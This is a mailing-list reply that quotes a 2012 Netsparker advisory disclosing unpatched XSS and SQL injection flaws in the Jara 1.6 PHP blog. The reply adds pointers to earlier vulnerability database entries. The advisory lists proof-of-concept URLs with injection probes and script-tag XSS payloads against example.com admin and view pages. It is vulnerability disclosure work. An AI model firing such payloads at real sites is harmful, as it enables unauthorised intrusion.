On Wed, Aug 22, 2012 at 12:33:37PM +0300, Netsparker Advisories wrote: > Information > -------------------- > Name : XSS and SQL Injection Vulnerabilities in Jara > Software : Jara 1.6 and possibly below. > Vendor Homepage : http://sourceforge.net/projects/jara/ > Vulnerability Type : Cross-Site Scripting and SQL Injection > Severity : Critical > Researcher : Canberk Bolat > Advisory Reference : NS-12-009 > > Description > -------------------- > An open source simple blog utilising the features of PHP 5 and MySQL > 5. Supports multiple writers, categories, managing posts, static > content pages and post comments as well as providing an intuitive > administration panel. > > Details > -------------------- > Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6. > > Example PoC urls are as follows : > > SQL Injection Vulnerabilities > http://example.com/login.php (POST - username) > http://example.com/login.php (POST - password) > http://example.com/admin/delete_page.php?id='%2BNSFTW%2B' > http://example.com/admin/delete_post.php?id='%2BNSFTW%2B' > http://example.com/admin/delete_category.php?id='%2BNSFTW%2B' > http://example.com/admin/delete_user.php?id='%2BNSFTW%2B' > http://example.com/admin/edit_page.php?id='%2BNSFTW%2B' > http://example.com/admin/edit_user.php?id='%2BNSFTW%2B' > http://example.com/admin/edit_post.php (POST - id) > http://example.com/admin/edit_category.php (POST - id) > > XSS Vulnerabilities > http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E > http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E > http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E > http://example.com/login.php (POST - username) > http://example.com/login.php (POST - password) > http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E > http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E > http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E > http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E > http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E > http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E > http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E > http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E > > > You can read the full article about Cross-Site Scripting and SQL > Injection vulnerabilities from here : > > Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/ > SQL Injection: http://www.mavitunasecurity.com/sql-injection/ > > Solution > -------------------- > No patch released. > > Advisory Timeline > -------------------- > 19/11/2011 - Couldn’t found a contact e-mail > 22/08/2012 - Vulnerability Released > > Credits > -------------------- > It has been discovered on testing of Netsparker, Web Application > Security Scanner - http://www.mavitunasecurity.com/netsparker/. > > References > -------------------- > MSL Advisory Link : > http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/ > Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/ > > About Netsparker > -------------------- > Netsparker® can find and report security issues such as SQL Injection > and Cross-site Scripting (XSS) in all web applications regardless of > the platform and the technology they are built on. Netsparker's unique > detection and exploitation techniques allows it to be dead accurate in > reporting hence it's the first and the only False Positive Free web > application security scanner. > > -- > Netsparker Advisories, <advisories@xxxxxxxxxxxxxxxxxxxx> > Homepage, http://www.mavitunasecurity.com/netsparker-advisories/ Also some of these issues have been listed in OSVDB. You should check vulnerability databases before posting advisories. http://osvdb.org/show/osvdb/76484 http://osvdb.org/show/osvdb/83346 http://osvdb.org/show/osvdb/83345 http://osvdb.org/show/osvdb/83330 You might want to send a message to the project owner via URL https://sourceforge.net/sendmessage.php?touser=2328649 - Henri Salo
